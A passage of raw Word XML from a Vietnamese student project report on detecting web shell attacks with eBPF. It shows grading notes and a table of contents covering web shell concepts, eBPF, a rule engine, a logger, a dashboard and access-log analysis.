        <w:t>GIÁO VIÊN CHẤM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghi chú: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Điểm trong khung “sinh viên thực hiện” là điểm kết quả cuối cùng của từng sinh viên trong quá trình thực hiện niên luận.. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu sinh viên demo chương trình và trả lời vấn đáp không đạt yêu cầu của giáo viên hướng dẫn thì sinh viên không thể đạt điểm &gt;F (Nghĩa là sinh viên đó bị rớt NL trong năm học này). Nghĩa là giáo viên chỉ đánh giá theo các tiêu chí trên (mẫu chấm) khi sinh viên đáp ứng được yêu cầu tối thiểu về demo chương trình và trả lời vấn đáp của giáo viên hướng dẫn. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Khuyến khích sinh viên có tính sáng tạo và bổ sung thêm những yêu cầu khác nếu thấy cần thiết trong thiết kế/lập trình.</w:t>
      </w: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ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders>
            <w:top w:val="none" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:sz="0" w:space="0"/>
            <w:right w:val="none" w:sz="0" w:space="0"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:space="720" w:num="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9052"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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TOC \o "1-2" \h \u </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_Toc568534403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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>TỔNG QUAN VỀ WEB SHELL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc568534403 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</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_Toc1014285347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tl w:val="0"/>
        </w:rPr>
        <w:t>1.1. KHÁI NIỆM WEB SHELL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1014285347 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</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_Toc1510675631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1.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>TÍNH CẤP THIẾT CỦA ĐỀ TÀI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1510675631 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</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_Toc2053949414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1.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>THÁCH THỨC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2053949414 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</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_Toc793349258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1.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>CÁC DẤU HIỆU CỦA HÀNH VI TẤN CÔNG WEB SHELL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc793349258 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</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0"/>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_Toc1870125869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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>CÔNG CỤ eBPF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1870125869 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</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_Toc1816952761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2.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>KHÁI NIỆM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1816952761 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</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_Toc612578437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2.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>LỊCH SỬ PHÁT TRIỂN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc612578437 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</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_Toc108182361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2.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>LUỒNG HOẠT ĐỘNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc108182361 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</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_Toc937551007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tl w:val="0"/>
        </w:rPr>
        <w:t>2.4. ĐIỂM MẠNH VÀ ĐIỂM YẾU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc937551007 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</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_Toc1717014214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2.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>ỨNG DỤNG THỰC TẾ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1717014214 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</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0"/>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_Toc1993472461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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>PHÂN TÍCH VÀ THIẾT KẾ HỆ THỐNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1993472461 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</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_Toc437081944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3.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>TỔNG QUAN TRIỂN KHAI HỆ THỐNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc437081944 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</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_Toc104134879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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>THIẾT KẾ CHỨC NĂNG HỆ THỐNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc104134879 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</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_Toc1905538063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3.2.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Lưu đồ xử lý tổng thể</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1905538063 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</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_Toc1468785264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3.2.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1468785264 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11</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_Toc1520688188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3.2.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thu thập và chuẩn hóa dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1520688188 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12</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_Toc21125303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tl w:val="0"/>
        </w:rPr>
        <w:t>3.2.5. Logger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21125303 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</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_Toc1775560227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3.2.6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Rule Engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1775560227 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14</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_Toc1821526878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tl w:val="0"/>
        </w:rPr>
        <w:t>3.2.7. Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1821526878 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</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_Toc1091884872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3.2.8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Cây tiến trình</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1091884872 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</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0"/>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_Toc215810138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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thành Phần mở rộng Web Server Access Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
